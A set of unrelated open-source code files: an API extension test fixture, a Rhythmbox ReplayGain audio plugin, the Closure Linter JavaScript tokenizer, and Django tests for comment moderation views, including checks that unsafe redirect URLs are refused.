#NOTE: This only handles JSON responses. # You can use content type header to test for XML. resp_obj.obj['flavor']['googoose'] = req.GET.get('chewing') class FoxInSocksFlavorBandsControllerExtension(wsgi.Controller): @wsgi.extends def show(self, req, resp_obj, id): #NOTE: This only handles JSON responses. # You can use content type header to test for XML. resp_obj.obj['big_bands'] = 'Pig Bands!' class Foxinsocks(extensions.ExtensionDescriptor): """The Fox In Socks Extension""" name = "Fox In Socks" alias = "FOXNSOX" namespace = "http://www.fox.in.socks/api/ext/pie/v1.0" updated = "2011-01-22T13:25:27-06:00" def __init__(self, ext_mgr): ext_mgr.register(self) def get_resources(self): resources = [] resource = extensions.ResourceExtension('foxnsocks', FoxInSocksController()) resources.append(resource) return resources def get_controller_extensions(self): extension_list = [] extension_set = [ (FoxInSocksServerControllerExtension, 'servers'), (FoxInSocksFlavorGooseControllerExtension, 'flavors'), (FoxInSocksFlavorBandsControllerExtension, 'flavors'), ] for klass, collection in extension_set: controller = klass() ext = extensions.ControllerExtension(self, collection, controller) extension_list.append(ext) return extension_list
apache-2.0
mssurajkaiga/rhythmbox
plugins/replaygain/player.py
1
8117
# -*- Mode: python; coding: utf-8; tab-width: 8; indent-tabs-mode: t; -*- # # Copyright (C) 2010 Jonathan Matthew # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # The Rhythmbox authors hereby grant permission for non-GPL compatible # GStreamer plugins to be used and distributed together with GStreamer # and Rhythmbox. This permission is above and beyond the permissions granted # by the GPL license by which Rhythmbox is covered. If you modify this code # you may extend this exception to your version of the code, but you are not # obligated to do so. If you do not wish to do so, delete this exception # statement from your version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # import rb import gi gi.require_version("Gst", "0.11") from gi.repository import RB from gi.repository import GObject, Gio, Gst import config import gettext gettext.install('rhythmbox', RB.locale_dir()) EPSILON = 0.001 class ReplayGainPlayer(object): def __init__(self, shell): # make sure the replaygain elements are available missing = [] required = ("rgvolume", "rglimiter") for e in required: if Gst.ElementFactory.find(e) is None: missing.append(e) if len(missing) > 0: msg = _("The GStreamer elements required for ReplayGain processing are not available. The missing elements are: %s") % ", ".join(missing) RB.error_dialog(shell.props.window, _("ReplayGain GStreamer plugins not available"), msg) raise Exception(msg) self.shell_player = shell.props.shell_player self.player = self.shell_player.props.player self.settings = Gio.Settings("org.gnome.rhythmbox.plugins.replaygain") self.settings.connect("changed::limiter", self.limiter_changed_cb) self.previous_gain = [] self.fallback_gain = 0.0 self.resetting_rgvolume = False # we use different means to hook into the playback pipeline depending on # the playback backend in use if GObject.signal_lookup("get-stream-filters", self.player): self.setup_xfade_mode() self.deactivate_backend = self.deactivate_xfade_mode else: self.setup_playbin_mode() self.deactivate_backend = self.deactivate_playbin_mode def deactivate(self): self.deactivate_backend() self.player = None self.shell_player = None def set_rgvolume(self, rgvolume): # set preamp level preamp = self.settings['preamp'] rgvolume.props.pre_amp = preamp # set mode # there may eventually be a 'guess' mode here that tries to figure out # what to do based on the upcoming tracks mode = self.settings['mode'] if mode == config.REPLAYGAIN_MODE_ALBUM: rgvolume.props.album_mode = 1 else: rgvolume.props.album_mode = 0 # set calculated fallback gain rgvolume.props.fallback_gain = self.fallback_gain print "updated rgvolume settings: preamp %f, album-mode %s, fallback gain %f" % ( rgvolume.props.pre_amp, str(rgvolume.props.album_mode), rgvolume.props.fallback_gain) def update_fallback_gain(self, rgvolume): gain = rgvolume.props.target_gain - rgvolume.props.pre_amp # filter out bogus notifications if abs(gain - self.fallback_gain) < EPSILON: print "ignoring gain %f (current fallback gain)" % gain return False if abs(gain) < EPSILON: print "ignoring zero gain (pretty unlikely)" return False # update the running average if len(self.previous_gain) == config.AVERAGE_GAIN_SAMPLES: self.previous_gain.pop(0) self.previous_gain.append(gain) self.fallback_gain = sum(self.previous_gain) / len(self.previous_gain) print "got target gain %f; running average of previous gain values is %f" % (gain, self.fallback_gain) return True ### playbin mode (rgvolume ! rglimiter as global filter) def playbin_uri_notify_cb(self, playbin, pspec): self.got_replaygain = False def playbin_notify_cb(self, player, pspec): playbin = player.props.playbin playbin.connect("notify::uri", self.playbin_uri_notify_cb) def playbin_target_gain_cb(self, rgvolume, pspec): #if self.resetting_rgvolume is True: # return if self.update_fallback_gain(rgvolume) == True: self.got_replaygain = True # do something clever probably def rgvolume_reset_done(self, pad, blocked, rgvolume): print "rgvolume reset done" self.set_rgvolume(rgvolume) def rgvolume_blocked_cb(self, pad, blocked, rgvolume): print "bouncing rgvolume state to reset tags" # somehow need to decide whether we've already got a gain value for the new track #self.resetting_rgvolume = True rgvolume.set_state(Gst.State.READY) rgvolume.set_state(Gst.State.PLAYING) #self.resetting_rgvolume = False pad.set_blocked_async(False, self.rgvolume_reset_done, rgvolume) def playing_entry_changed(self, player, entry): if entry is None: return if self.got_replaygain is False: print "blocking rgvolume to reset it" pad = self.rgvolume.get_static_pad("sink").get_peer() pad.set_blocked_async(True, self.rgvolume_blocked_cb, self.rgvolume) else: print "no need to reset rgvolume" def setup_playbin_mode(self): print "using output filter for rgvolume and rglimiter" self.rgvolume = Gst.ElementFactory.make("rgvolume", None) self.rgvolume.connect("notify::target-gain", self.playbin_target_gain_cb) self.rglimiter = Gst.ElementFactory.make("rglimiter", None) # on track changes, we need to reset the rgvolume state, otherwise it # carries over the tags from the previous track self.pec_id = self.shell_player.connect('playing-song-changed', self.playing_entry_changed) # watch playbin's uri property to see when a new track is opened playbin = self.player.props.playbin if playbin is None: self.player.connect("notify::playbin", self.playbin_notify_cb) else: playbin.connect("notify::uri", self.playbin_uri_notify_cb) # work around bug #621632 by adding these as separate filters # XXX try not doing this with 0.11 once filters exist again self.player.add_filter(self.rgvolume) self.player.add_filter(self.rglimiter) self.rgfilter = None def deactivate_playbin_mode(self): if self.rgfilter == None: self.player.remove_filter(self.rglimiter) self.player.remove_filter(self.rgvolume) else: self.player.remove_filter(self.rgfilter) self.rgfilter = None self.shell_player.disconnect(self.pec_id) self.pec_id = None ### xfade mode (rgvolume as stream filter, rglimiter as global filter) def xfade_target_gain_cb(self, rgvolume, pspec): if self.update_fallback_gain(rgvolume) is True: # we don't want any further notifications from this stream rgvolume.disconnect_by_func(self.xfade_target_gain_cb) def create_stream_filter_cb(self, player, uri): print "creating rgvolume instance for stream %s" % uri rgvolume = Gst.ElementFactory.make("rgvolume", None) rgvolume.connect("notify::target-gain", self.xfade_target_gain_cb) self.set_rgvolume(rgvolume) return [rgvolume] def limiter_changed_cb(self, settings, key): if self.rglimiter is not None: limiter = settings['limiter'] print "limiter setting is now %s" % str(limiter) self.rglimiter.props.enabled = limiter def setup_xfade_mode(self): print "using per-stream filter for rgvolume" self.stream_filter_id = self.player.connect("get-stream-filters", self.create_stream_filter_cb) # and add rglimiter as an output filter self.rglimiter = Gst.ElementFactory.make("rglimiter", None) self.player.add_filter(self.rglimiter) def deactivate_xfade_mode(self): self.player.disconnect(self.stream_filter_id) self.stream_filter_id = None self.player.remove_filter(self.rglimiter) self.rglimiter = None
gpl-2.0
asankah/closure-linter
closure_linter/javascripttokenizer.py
1
16385
#!/usr/bin/env python # # Copyright 2007 The Closure Linter Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Regular expression based JavaScript parsing classes.""" __author__ = ('robbyw@google.com (Robert Walker)', 'ajp@google.com (Andy Perelson)') import copy import re from closure_linter import javascripttokens from closure_linter.common import matcher from closure_linter.common import tokenizer # Shorthand Type = javascripttokens.JavaScriptTokenType Matcher = matcher.Matcher class JavaScriptModes(object): """Enumeration of the different matcher modes used for JavaScript.""" TEXT_MODE = 'text' SINGLE_QUOTE_STRING_MODE = 'single_quote_string' DOUBLE_QUOTE_STRING_MODE = 'double_quote_string' BLOCK_COMMENT_MODE = 'block_comment' DOC_COMMENT_MODE = 'doc_comment' DOC_COMMENT_LEX_SPACES_MODE = 'doc_comment_spaces' LINE_COMMENT_MODE = 'line_comment' PARAMETER_MODE = 'parameter' FUNCTION_MODE = 'function' class JavaScriptTokenizer(tokenizer.Tokenizer): """JavaScript tokenizer. Convert JavaScript code in to an array of tokens. """ # Useful patterns for JavaScript parsing. IDENTIFIER_CHAR = r'A-Za-z0-9_$.' # Number patterns based on: # http://www.mozilla.org/js/language/js20-2000-07/formal/lexer-grammar.html MANTISSA = r""" (\d+(?!\.)) | # Matches '10' (\d+\.(?!\d)) | # Matches '10.' (\d*\.\d+) # Matches '.5' or '10.5' """ DECIMAL_LITERAL = r'(%s)([eE][-+]?\d+)?' % MANTISSA HEX_LITERAL = r'0[xX][0-9a-fA-F]+' NUMBER = re.compile(r""" ((%s)|(%s)) """ % (HEX_LITERAL, DECIMAL_LITERAL), re.VERBOSE) # Strings come in three parts - first we match the start of the string, then # the contents, then the end. The contents consist of any character except a # backslash or end of string, or a backslash followed by any character, or a # backslash followed by end of line to support correct parsing of multi-line # strings. SINGLE_QUOTE = re.compile(r"'") SINGLE_QUOTE_TEXT = re.compile(r"([^'\\]|\\(.|$))+") DOUBLE_QUOTE = re.compile(r'"') DOUBLE_QUOTE_TEXT = re.compile(r'([^"\\]|\\(.|$))+') START_SINGLE_LINE_COMMENT = re.compile(r'//') END_OF_LINE_SINGLE_LINE_COMMENT = re.compile(r'//$') START_DOC_COMMENT = re.compile(r'/\*\*') START_BLOCK_COMMENT = re.compile(r'/\*') END_BLOCK_COMMENT = re.compile(r'\*/') BLOCK_COMMENT_TEXT = re.compile(r'([^*]|\*(?!/))+') # Comment text is anything that we are not going to parse into another special # token like (inline) flags or end comments. Complicated regex to match # most normal characters, and '*', '{', '}', and '@' when we are sure that # it is safe. Expression [^*{\s]@ must come first, or the other options will # match everything before @, and we won't match @'s that aren't part of flags # like in email addresses in the @author tag. DOC_COMMENT_TEXT = re.compile(r'([^*{}\s]@|[^*{}@]|\*(?!/))+') DOC_COMMENT_NO_SPACES_TEXT = re.compile(r'([^*{}\s]@|[^*{}@\s]|\*(?!/))+') # Match the prefix ' * ' that starts every line of jsdoc. Want to include # spaces after the '*', but nothing else that occurs after a '*', and don't # want to match the '*' in '*/'. DOC_PREFIX = re.compile(r'\s*\*(\s+|(?!/))') START_BLOCK = re.compile('{') END_BLOCK = re.compile('}') REGEX_CHARACTER_CLASS = r""" \[ # Opening bracket ([^\]\\]|\\.)* # Anything but a ] or \, # or a backslash followed by anything \] # Closing bracket """ # We ensure the regex is followed by one of the above tokens to avoid # incorrectly parsing something like x / y / z as x REGEX(/ y /) z POST_REGEX_LIST = [ ';', ',', r'\.', r'\)', r'\]', '$', r'\/\/', r'\/\*', ':', '}'] REGEX = re.compile(r""" / # opening slash (?!\*) # not the start of a comment (\\.|[^\[\/\\]|(%s))* # a backslash followed by anything, # or anything but a / or [ or \, # or a character class / # closing slash [gimsx]* # optional modifiers (?=\s*(%s)) """ % (REGEX_CHARACTER_CLASS, '|'.join(POST_REGEX_LIST)), re.VERBOSE) ANYTHING = re.compile(r'.*') PARAMETERS = re.compile(r'[^\)]+') CLOSING_PAREN_WITH_SPACE = re.compile(r'\)\s*') FUNCTION_DECLARATION = re.compile(r'\bfunction\b') OPENING_PAREN = re.compile(r'\(') CLOSING_PAREN = re.compile(r'\)') OPENING_BRACKET = re.compile(r'\[') CLOSING_BRACKET = re.compile(r'\]') # We omit these JS keywords from the list: # function - covered by FUNCTION_DECLARATION. # delete, in, instanceof, new, typeof - included as operators. # this - included in identifiers. # null, undefined - not included, should go in some "special constant" list. KEYWORD_LIST = ['break', 'case', 'catch', 'continue', 'default', 'do', 'else', 'finally', 'for', 'if', 'return', 'switch', 'throw', 'try', 'var', 'while', 'with'] # List of regular expressions to match as operators. Some notes: for our # purposes, the comma behaves similarly enough to a normal operator that we # include it here. r'\bin\b' actually matches 'in' surrounded by boundary # characters - this may not match some very esoteric uses of the in operator. # Operators that are subsets of larger operators must come later in this list # for proper matching, e.g., '>>' must come AFTER '>>>'. OPERATOR_LIST = [',', r'\+\+', '===', '!==', '>>>=', '>>>', '==', '>=', '<=', '!=', '<<=', '>>=', '<<', '>>', '>', '<', r'\+=', r'\+', '--', '\^=', '-=', '-', '/=', '/', r'\*=', r'\*', '%=', '%', '&&', r'\|\|', '&=', '&', r'\|=', r'\|', '=', '!', ':', '\?', r'\^', r'\bdelete\b', r'\bin\b', r'\binstanceof\b', r'\bnew\b', r'\btypeof\b', r'\bvoid\b'] OPERATOR = re.compile('|'.join(OPERATOR_LIST)) WHITESPACE = re.compile(r'\s+') SEMICOLON = re.compile(r';') # Technically JavaScript identifiers can't contain '.', but we treat a set of # nested identifiers as a single identifier. NESTED_IDENTIFIER = r'[a-zA-Z_$][%s.]*' % IDENTIFIER_CHAR IDENTIFIER = re.compile(NESTED_IDENTIFIER) SIMPLE_LVALUE = re.compile(r""" (?P<identifier>%s) # a valid identifier (?=\s* # optional whitespace \= # look ahead to equal sign (?!=)) # not follwed by equal """ % NESTED_IDENTIFIER, re.VERBOSE) # A doc flag is a @ sign followed by non-space characters that appears at the # beginning of the line, after whitespace, or after a '{'. The look-behind # check is necessary to not match someone@google.com as a flag. DOC_FLAG = re.compile(r'(^|(?<=\s))@(?P<name>[a-zA-Z]+)') # To properly parse parameter names, we need to tokenize whitespace into a # token. DOC_FLAG_LEX_SPACES = re.compile(r'(^|(?<=\s))@(?P<name>%s)\b' % '|'.join(['param'])) DOC_INLINE_FLAG = re.compile(r'(?<={)@(?P<name>[a-zA-Z]+)') # Star followed by non-slash, i.e a star that does not end a comment. # This is used for TYPE_GROUP below. SAFE_STAR = r'(\*(?!/))' COMMON_DOC_MATCHERS = [ # Find the end of the comment. Matcher(END_BLOCK_COMMENT, Type.END_DOC_COMMENT, JavaScriptModes.TEXT_MODE), # Tokenize documented flags like @private. Matcher(DOC_INLINE_FLAG, Type.DOC_INLINE_FLAG), Matcher(DOC_FLAG_LEX_SPACES, Type.DOC_FLAG, JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE), # Encountering a doc flag should leave lex spaces mode. Matcher(DOC_FLAG, Type.DOC_FLAG, JavaScriptModes.DOC_COMMENT_MODE), # Tokenize braces so we can find types. Matcher(START_BLOCK, Type.DOC_START_BRACE), Matcher(END_BLOCK, Type.DOC_END_BRACE), Matcher(DOC_PREFIX, Type.DOC_PREFIX, None, True)] # When text is not matched, it is given this default type based on mode. # If unspecified in this map, the default default is Type.NORMAL. JAVASCRIPT_DEFAULT_TYPES = { JavaScriptModes.DOC_COMMENT_MODE: Type.COMMENT, JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE: Type.COMMENT } @classmethod def BuildMatchers(cls): """Builds the token matcher group. The token matcher groups work as follows: it is a list of Matcher objects. The matchers will be tried in this order, and the first to match will be returned. Hence the order is important because the matchers that come first overrule the matchers that come later. Returns: The completed token matcher group. """ # Match a keyword string followed by a non-identifier character in order to # not match something like doSomething as do + Something. keyword = re.compile('(%s)((?=[^%s])|$)' % ( '|'.join(cls.KEYWORD_LIST), cls.IDENTIFIER_CHAR)) return { # Matchers for basic text mode. JavaScriptModes.TEXT_MODE: [ # Check a big group - strings, starting comments, and regexes - all # of which could be intertwined. 'string with /regex/', # /regex with 'string'/, /* comment with /regex/ and string */ (and # so on) Matcher(cls.START_DOC_COMMENT, Type.START_DOC_COMMENT, JavaScriptModes.DOC_COMMENT_MODE), Matcher(cls.START_BLOCK_COMMENT, Type.START_BLOCK_COMMENT, JavaScriptModes.BLOCK_COMMENT_MODE), Matcher(cls.END_OF_LINE_SINGLE_LINE_COMMENT, Type.START_SINGLE_LINE_COMMENT), Matcher(cls.START_SINGLE_LINE_COMMENT, Type.START_SINGLE_LINE_COMMENT, JavaScriptModes.LINE_COMMENT_MODE), Matcher(cls.SINGLE_QUOTE, Type.SINGLE_QUOTE_STRING_START, JavaScriptModes.SINGLE_QUOTE_STRING_MODE), Matcher(cls.DOUBLE_QUOTE, Type.DOUBLE_QUOTE_STRING_START, JavaScriptModes.DOUBLE_QUOTE_STRING_MODE), Matcher(cls.REGEX, Type.REGEX), # Next we check for start blocks appearing outside any of the items # above. Matcher(cls.START_BLOCK, Type.START_BLOCK), Matcher(cls.END_BLOCK, Type.END_BLOCK), # Then we search for function declarations. Matcher(cls.FUNCTION_DECLARATION, Type.FUNCTION_DECLARATION, JavaScriptModes.FUNCTION_MODE), # Next, we convert non-function related parens to tokens. Matcher(cls.OPENING_PAREN, Type.START_PAREN), Matcher(cls.CLOSING_PAREN, Type.END_PAREN), # Next, we convert brackets to tokens. Matcher(cls.OPENING_BRACKET, Type.START_BRACKET), Matcher(cls.CLOSING_BRACKET, Type.END_BRACKET), # Find numbers. This has to happen before operators because # scientific notation numbers can have + and - in them. Matcher(cls.NUMBER, Type.NUMBER), # Find operators and simple assignments Matcher(cls.SIMPLE_LVALUE, Type.SIMPLE_LVALUE), Matcher(cls.OPERATOR, Type.OPERATOR), # Find key words and whitespace. Matcher(keyword, Type.KEYWORD), Matcher(cls.WHITESPACE, Type.WHITESPACE), # Find identifiers. Matcher(cls.IDENTIFIER, Type.IDENTIFIER), # Finally, we convert semicolons to tokens. Matcher(cls.SEMICOLON, Type.SEMICOLON)], # Matchers for single quote strings. JavaScriptModes.SINGLE_QUOTE_STRING_MODE: [ Matcher(cls.SINGLE_QUOTE_TEXT, Type.STRING_TEXT), Matcher(cls.SINGLE_QUOTE, Type.SINGLE_QUOTE_STRING_END, JavaScriptModes.TEXT_MODE)], # Matchers for double quote strings. JavaScriptModes.DOUBLE_QUOTE_STRING_MODE: [ Matcher(cls.DOUBLE_QUOTE_TEXT, Type.STRING_TEXT), Matcher(cls.DOUBLE_QUOTE, Type.DOUBLE_QUOTE_STRING_END, JavaScriptModes.TEXT_MODE)], # Matchers for block comments. JavaScriptModes.BLOCK_COMMENT_MODE: [ # First we check for exiting a block comment. Matcher(cls.END_BLOCK_COMMENT, Type.END_BLOCK_COMMENT, JavaScriptModes.TEXT_MODE), # Match non-comment-ending text.. Matcher(cls.BLOCK_COMMENT_TEXT, Type.COMMENT)], # Matchers for doc comments. JavaScriptModes.DOC_COMMENT_MODE: cls.COMMON_DOC_MATCHERS + [ Matcher(cls.DOC_COMMENT_TEXT, Type.COMMENT)], JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE: cls.COMMON_DOC_MATCHERS + [ Matcher(cls.WHITESPACE, Type.COMMENT), Matcher(cls.DOC_COMMENT_NO_SPACES_TEXT, Type.COMMENT)], # Matchers for single line comments. JavaScriptModes.LINE_COMMENT_MODE: [ # We greedy match until the end of the line in line comment mode. Matcher(cls.ANYTHING, Type.COMMENT, JavaScriptModes.TEXT_MODE)], # Matchers for code after the function keyword. JavaScriptModes.FUNCTION_MODE: [ # Must match open paren before anything else and move into parameter # mode, otherwise everything inside the parameter list is parsed # incorrectly. Matcher(cls.OPENING_PAREN, Type.START_PARAMETERS, JavaScriptModes.PARAMETER_MODE), Matcher(cls.WHITESPACE, Type.WHITESPACE), Matcher(cls.IDENTIFIER, Type.FUNCTION_NAME)], # Matchers for function parameters JavaScriptModes.PARAMETER_MODE: [ # When in function parameter mode, a closing paren is treated # specially. Everything else is treated as lines of parameters. Matcher(cls.CLOSING_PAREN_WITH_SPACE, Type.END_PARAMETERS, JavaScriptModes.TEXT_MODE), Matcher(cls.PARAMETERS, Type.PARAMETERS, JavaScriptModes.PARAMETER_MODE)]} def __init__(self, parse_js_doc = True): """Create a tokenizer object. Args: parse_js_doc: Whether to do detailed parsing of javascript doc comments, or simply treat them as normal comments. Defaults to parsing JsDoc. """ matchers = self.BuildMatchers() if not parse_js_doc: # Make a copy so the original doesn't get modified. matchers = copy.deepcopy(matchers) matchers[JavaScriptModes.DOC_COMMENT_MODE] = matchers[ JavaScriptModes.BLOCK_COMMENT_MODE] tokenizer.Tokenizer.__init__(self, JavaScriptModes.TEXT_MODE, matchers, self.JAVASCRIPT_DEFAULT_TYPES) def _CreateToken(self, string, token_type, line, line_number, values=None): """Creates a new JavaScriptToken object. Args: string: The string of input the token contains. token_type: The type of token. line: The text of the line this token is in. line_number: The line number of the token. values: A dict of named values within the token. For instance, a function declaration may have a value called 'name' which captures the name of the function. """ return javascripttokens.JavaScriptToken(string, token_type, line, line_number, values, line_number)
apache-2.0
xq262144/hue
desktop/core/ext-py/Django-1.6.10/tests/comment_tests/tests/test_moderation_views.py
58
13414
from __future__ import absolute_import, unicode_literals from django.contrib.auth.models import User, Permission from django.contrib.comments import signals from django.contrib.comments.models import Comment, CommentFlag from django.contrib.contenttypes.models import ContentType from django.utils import translation from . import CommentTestCase class FlagViewTests(CommentTestCase): def testFlagGet(self): """GET the flag view: render a confirmation page.""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/flag/%d/" % pk) self.assertTemplateUsed(response, "comments/flag.html") def testFlagPost(self): """POST the flag view: actually flag the view (nice for XHR)""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/flagged/?c=%d" % pk) c = Comment.objects.get(pk=pk) self.assertEqual(c.flags.filter(flag=CommentFlag.SUGGEST_REMOVAL).count(), 1) return c def testFlagPostNext(self): """ POST the flag view, explicitly providing a next url. """ comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % pk) def testFlagPostUnsafeNext(self): """ POSTing to the flag view with an unsafe next url will ignore the provided url when redirecting. """ comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/flagged/?c=%d" % pk) def testFlagPostTwice(self): """Users don't get to flag comments more than once.""" c = self.testFlagPost() self.client.post("/flag/%d/" % c.pk) self.client.post("/flag/%d/" % c.pk) self.assertEqual(c.flags.filter(flag=CommentFlag.SUGGEST_REMOVAL).count(), 1) def testFlagAnon(self): """GET/POST the flag view while not logged in: redirect to log in.""" comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/flag/%d/" % pk) response = self.client.post("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/flag/%d/" % pk) def testFlaggedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/flagged/", data={"c": pk}) self.assertTemplateUsed(response, "comments/flagged.html") def testFlagSignals(self): """Test signals emitted by the comment flag view""" # callback def receive(sender, **kwargs): self.assertEqual(kwargs['flag'].flag, CommentFlag.SUGGEST_REMOVAL) self.assertEqual(kwargs['request'].user.username, "normaluser") received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testFlagPost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def makeModerator(username): u = User.objects.get(username=username) ct = ContentType.objects.get_for_model(Comment) p = Permission.objects.get(content_type=ct, codename="can_moderate") u.user_permissions.add(p) class DeleteViewTests(CommentTestCase): def testDeletePermissions(self): """The delete view should only be accessible to 'moderators'""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/delete/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/delete/%d/" % pk) makeModerator("normaluser") response = self.client.get("/delete/%d/" % pk) self.assertEqual(response.status_code, 200) def testDeletePost(self): """POSTing the delete view should mark the comment as removed""" comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/deleted/?c=%d" % pk) c = Comment.objects.get(pk=pk) self.assertTrue(c.is_removed) self.assertEqual(c.flags.filter(flag=CommentFlag.MODERATOR_DELETION, user__username="normaluser").count(), 1) def testDeletePostNext(self): """ POSTing the delete view will redirect to an explicitly provided a next url. """ comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % pk) def testDeletePostUnsafeNext(self): """ POSTing to the delete view with an unsafe next url will ignore the provided url when redirecting. """ comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/deleted/?c=%d" % pk) def testDeleteSignals(self): def receive(sender, **kwargs): received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testDeletePost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def testDeletedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/deleted/", data={"c": pk}) self.assertTemplateUsed(response, "comments/deleted.html") class ApproveViewTests(CommentTestCase): def testApprovePermissions(self): """The approve view should only be accessible to 'moderators'""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/approve/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/approve/%d/" % pk) makeModerator("normaluser") response = self.client.get("/approve/%d/" % pk) self.assertEqual(response.status_code, 200) def testApprovePost(self): """POSTing the approve view should mark the comment as removed""" c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk) self.assertEqual(response["Location"], "http://testserver/approved/?c=%d" % c1.pk) c = Comment.objects.get(pk=c1.pk) self.assertTrue(c.is_public) self.assertEqual(c.flags.filter(flag=CommentFlag.MODERATOR_APPROVAL, user__username="normaluser").count(), 1) def testApprovePostNext(self): """ POSTing the approve view will redirect to an explicitly provided a next url. """ c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % c1.pk) def testApprovePostUnsafeNext(self): """ POSTing to the approve view with an unsafe next url will ignore the provided url when redirecting. """ c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/approved/?c=%d" % c1.pk) def testApproveSignals(self): def receive(sender, **kwargs): received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testApprovePost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def testApprovedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/approved/", data={"c":pk}) self.assertTemplateUsed(response, "comments/approved.html") class AdminActionsTests(CommentTestCase): urls = "comment_tests.urls_admin" def setUp(self): super(AdminActionsTests, self).setUp() # Make "normaluser" a moderator u = User.objects.get(username="normaluser") u.is_staff = True perms = Permission.objects.filter( content_type__app_label = 'comments', codename__endswith = 'comment' ) for perm in perms: u.user_permissions.add(perm) u.save() def testActionsNonModerator(self): comments = self.createSomeComments() self.client.login(username="normaluser", password="normaluser") response = self.client.get("/admin/comments/comment/") self.assertNotContains(response, "approve_comments") def testActionsModerator(self): comments = self.createSomeComments() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.get("/admin/comments/comment/") self.assertContains(response, "approve_comments") def testActionsDisabledDelete(self): "Tests a CommentAdmin where 'delete_selected' has been disabled." comments = self.createSomeComments() self.client.login(username="normaluser", password="normaluser") response = self.client.get('/admin2/comments/comment/') self.assertEqual(response.status_code, 200) self.assertNotContains(response, '<option value="delete_selected">') def performActionAndCheckMessage(self, action, action_params, expected_message): response = self.client.post('/admin/comments/comment/', data={'_selected_action': action_params, 'action': action, 'index': 0}, follow=True) self.assertContains(response, expected_message) def testActionsMessageTranslations(self): c1, c2, c3, c4 = self.createSomeComments() one_comment = c1.pk many_comments = [c2.pk, c3.pk, c4.pk] makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") with translation.override('en'): #Test approving self.performActionAndCheckMessage('approve_comments', one_comment, '1 comment was successfully approved') self.performActionAndCheckMessage('approve_comments', many_comments, '3 comments were successfully approved') #Test flagging self.performActionAndCheckMessage('flag_comments', one_comment, '1 comment was successfully flagged') self.performActionAndCheckMessage('flag_comments', many_comments, '3 comments were successfully flagged') #Test removing self.performActionAndCheckMessage('remove_comments', one_comment, '1 comment was successfully removed') self.performActionAndCheckMessage('remove_comments', many_comments, '3 comments were successfully removed')
apache-2.0
sametmax/Django--an-app-at-a-time
